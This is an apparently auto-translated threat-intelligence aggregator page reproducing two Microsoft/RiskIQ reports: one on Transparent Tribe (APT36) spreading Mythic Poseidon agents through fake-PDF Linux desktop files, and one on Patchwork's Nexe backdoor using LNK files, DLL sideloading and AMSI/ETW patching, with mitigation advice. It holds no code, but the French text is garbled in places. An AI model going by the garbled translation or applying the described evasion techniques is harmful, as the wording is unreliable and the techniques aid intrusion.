One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8586788 |
| Date de publication | 2024-09-27 19:44:31 (vue: 2024-09-27 20:18:06) |
| Titre | OSINT ENQUÊTE: Chasse des infrastructures malveillantes liées à la tribu transparente OSINT Investigation: Hunting Malicious Infrastructure Linked to Transparent Tribe (Recyclage) |
| Texte | #### Géolocations ciblées - Inde #### Industries ciblées - agences et services gouvernementaux ## Instantané Des chercheurs de Cyfirma ont identifié des infrastructures malveillantes exploitées par une tribu transparente, également connue sous le nom d'APT36. ## Description Cette infrastructure comprend 15 hôtes malveillants hébergés par DigitalOcean, exécutant des serveurs mythiques C2.Transparent Tribe utilise le cadre d'exploitation mythique, conçu à l'origine pour faire équipe rouge, pour gérer les systèmes compromis.Le groupe vise des individus en Inde, probablement des représentants du gouvernement, en distribuant des fichiers d'entrée de bureau Linux déguisés en PDF.Ces fichiers téléchargent et exécutent des agents mythiques de Poséidon Binaires-Golang conçus pour les plates-formes Linux et MacOS X64, ce qui permet aux acteurs de la menace d'établir de la persistance et d'échapper à la détection. La tribu transparente est connue pour ses méthodes persistantes et évolutives, et cette campagne démontre leur ciblage accru des environnements Linux, en particulier ceux utilisés par le gouvernement indien.Cyfirma note que ces résultats mettent l'accent sur la nécessité d'une vigilance accrue et de mesures de défense proactives contre des menaces aussi sophistiquées et adaptatives. ## Analyse supplémentaire Opérationnel depuis 2013, [Tribu transparente] (https://attack.mitre.org/groups/g0134/) est un groupe de menaces basé au Pakistan qui cible principalement le gouvernement indien, la défense et l'éducation.La principale motivation du groupe est de mener un cyberespionnage et exploite une variété d'outils pour atteindre cet objectif, notamment des rats sur mesure ciblant les fenêtres, des cadres C2 open source armées, des installateurs de trojanisés imitants d'empruntSites de phishing conçus pour cibler les fonctionnaires du gouvernement indien.Le groupe a été observé en utilisant une variété de logiciels malveillants, notamment Elizarat, Caprarat, Poséidon, Crimsonrat, Oblicherat, Darkcomet et Peppy, entre autres. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir rapidement les outils d'attaquant en évolution et et et les outils d'attaquant en évolution rapide ettechniques.Les protections d'apprentissage automatique basées sur le cloud bloquent la majorité des menaces nouvelles et inconnues. - Exécuter [EDR en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc)Le défenseur du point final peut bloquer les artefacts malveillants, même lorsque votre antivirus non microsoft ne détecte pas la menace ou lorsque Microsoft Defender Antivirus fonctionne en mode passif.EDR en mode bloc fonctionne dans les coulisses pour corriger les artefacts malveillants qui sont détectés post-abri. - Autoriser [enquête et correction] (https: //learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) en mode automatisé complet pour permettre à Microsoft Defender le point de terminaison de prendre des mesures immédiates sur les alertes pour résoudre les violations, réduisant considérablement le volume d'alerte. - [Activé] (https://learn.microsoft.com/en-us/defender-endpoint/enable-ctrelled-folders) Accès aux dossiers contrôlés. - Assurez-vous que [Protection de stimulation] (https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-Or-Manage-Tamper-Protection) est activé dans Microsoft Defender pour Endpoint. - Activer [Protection réseau] (https://learn.microsoft.com/en- |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2013 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed achieve action actors adaptive additional af74 against age agencies agents alert alerts all allow also among analysis android antivirus any applications apps apt36 are artifacts attack attacker authority automated based been behind binaries block breach breaches built campaign can caprarat changes client cloud com/en com/microsoft com/research/osint com/threatanalytics3/9382203e common components compromised conduct configure content controlled copyright cover credential crimsonrat criterion custom customers cyberespionage cyfirma darkcomet defend defender defense delivered demonstrates description designed desktop detect detected detection detects digitalocean disguised distributing distribution does download edr education elizarat email emphasize enable enabled enabling encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent ensure entry environments equivalent establish evade even evolving executable execute exploitation files findings folder folders follow following framework frameworks from full geolocations goal golang government group hardening has have heightened hosted hosts https://attack https://learn https://security https://www hunting identified immediate impact impersonating includes including increased india indian individuals industries infrastructure installers investigation investigation: investigations its known learndoc learning leverage like likely linked linux list local lsa lsass machine macos main majority malicious malware malware: manage measures meet methods microsoft microsoftrecommends mitigations mitre mode motivation mythic name=trojan:linux/multiverze name=trojan:linux/mythicposeidon need network new non not notes obliquerat observed ocid=magicti officials open operated operational org/groups/g0134/ originally osint others overview pakistan part particularly passive pdfs peppy permission persistence persistent phishing platforms poseidon post preferences premises prevalence prevent primarily proactive product prohibited protection protection#how protections ransomware rapidly rats recommendations red reduce reducing reduction reference#block references remediate remediation reproduction researchers reserved resolve rights rule rules run running scenes sectors security servers services settings significantly since site sites snapshot sophisticated source stealing subsystem such surface systems take tamper target targeted targeting targets teaming techniques theft thereof these those threat threats tools transparent transparenttribe tribe tribe/ trojan:linux/multiverze trojan:linux/mythicposeidon trojanized trusted turn unknown unless us/defender us/wdsi/threats/malware used using utilizing variety view=o365 vigilance volume weaponized webmail when windows without works worldwide written x64 xdr your |
| Tags | Ransomware Malware Tool Threat Mobile |
| Stories | APT 36 |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8586752 |
| Date de publication | 2024-09-27 18:16:10 (vue: 2024-09-27 19:18:18) |
| Titre | Backdoor Unleashed: Patchwork Apt Group \\'s Sophistiqué d'évasion des défenses Nexe Backdoor Unleashed: Patchwork APT Group\\'s Sophisticated Evasion of Defenses |
| Texte | #### Targeted Geolocations - China - Bhutan ## Snapshot Cyble Research and Intelligence Labs (CRIL) has identified an ongoing campaign by the Patchwork APT group, also known as Dropping Elephant, targeting Chinese entities with a sophisticated backdoor named "Nexe." The group, active since 2009 and believed to be based in India, is known for cyber espionage and has been focusing on government, defense, and diplomatic entities across South and Southeast Asia. ## Description The initial infection vector for this campaign uses a malicious LNK file, likely distributed via phishing emails, which executes a PowerShell script to download a decoy PDF and a malicious Dynamic Link Library (DLL). Cyble has identified three distinct LNK files: two that likely target Chinese entities, while the third seems aimed at organizations in Bhutan. The malware uses DLL sideloading, where the legitimate system file “WerFaultSecure.exe” is exploited to load the malicious DLL, helping to obscure its presence. The DLL executes shellcode that patches APIs like AMSIscanBuffer and ETWEventWrite to bypass detection, allowing the malware to steal sensitive information. The final payload collects system data, including IP addresses, usernames, and device details, which are then encrypted and sent to a command-and-control server. Patchwork\'s evolving tactics and use of sophisticated evasion techniques, such as API patching and in-memory execution, highlight the group\'s advanced capabilities and pose significant challenges to targeted organizations. According to Cyble, Patchwork\'s ability to circumvent traditional security measures underscores the persistent threat they pose in cyber espionage operations. ## Additional Analysis Patchwork is known for its spear phishing and watering hole attacks that aim to gather intelligence from aviation, defense, energy, finanical, government, information technology, media, and non-governmental organizations (NGOs). The group has been observed using [BADNEWS](https://attack.mitre.org/software/S0128/) remote access trojan (RAT), [VajraSpy](https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/), [QuasarRAT](https://attack.mitre.org/software/S0262/), and [TINYTYPHON](https://attack.mitre.org/software/S0131/). A recent campaign [observed by ESET](https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/) saw the group distributing malicious apps bundled with VajraSpy in the Google Play Store likely targeting Pakistani users. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2009 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 ability access accessed according across action active additional addresses advanced af74 against age aim aimed alert alerts all allow allowing also amsiscanbuffer analysis antivirus any api apis apps apps/ apt are artifacts asia attack attacker attacks authority automated aviation backdoor badnews based been behind believed bhutan block breach breaches bundled bypass campaign can capabilities challenges changes china chinese circumvent client cloud collects com/blog/nexe com/en com/en/eset com/microsoft com/threatanalytics3/9382203e command common components configure content control controlled copyright cover credential cril criterion customers cyber cyble data decoy defend defender defense defenses defenses/ delivered description details detect detected detection detects device diplomatic distinct distributed distributing distribution dll does download dropping dynamic edr elephant email emails enable enabled encrypted encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent energy ensure entities equivalent eset espionage etweventwrite evasion even evolving executable executes execution exe” exploited file files files: final finanical focusing folder folders follow following from full gather geolocations google government governmental group groups hacktool:win32/autokms hardening has helping highlight hole https://attack https://cyble https://learn https://security https://www identified immediate impact including india infection information initial intelligence investigation investigations its known labs learndoc learning legitimate library like likely link list lnk load local lsa lsass machine majority malicious malware malware: manage measures media meet memory microsoft mitigations mitre mode mtb name=hacktool:win32/autokms name=trojan:win32/coinminer name=trojan:win32/killav name=trojan:win32/leonem name=trojan:win32/pollolnk name=trojan:win32/winlnk name=trojandropper:win32/znyonm named network new nexe ngos non not obscure observed ocid=magicti ongoing operations org/software/s0128/ org/software/s0131/ org/software/s0262/ organizations overview pakistani part passive patches patching patchwork payload pdf permission persistent phishing play pose post powershell preferences premises presence prevalence prevent product prohibited protection protection#how protections quasarrat ransomware rapidly rat recent recommendations recommends reduce reducing reduction reference#block references remediate remediation reproduction research research/vajraspy reserved resolve rights rule rules run running saw scenes script security seems sensitive sent server settings shellcode shr sideloading significant significantly since site snapshot sophisticated south southeast spear steal stealing store subsystem such surface system tactics take tamper target targeted targeting techniques technology theft then thereof third threat threats three tinytyphon tools traditional trojan trojan:win32/coinminer trojan:win32/killav trojan:win32/leonem trojan:win32/pollolnk trojan:win32/winlnk trojan:win32/znyonm trusted turn two underscores unknown unleashed unleashed: unless us/defender us/wdsi/threats/malware use used usernames users uses using vajraspy vector view=o365 volume watering webmail welivesecurity when where which windows without works worldwide written xdr your remote “werfaultsecure |
| Tags | Ransomware Malware Tool Threat Patching |
| Stories | |
| Move |
|
L'article ne semble pas avoir été repris sur un précédent.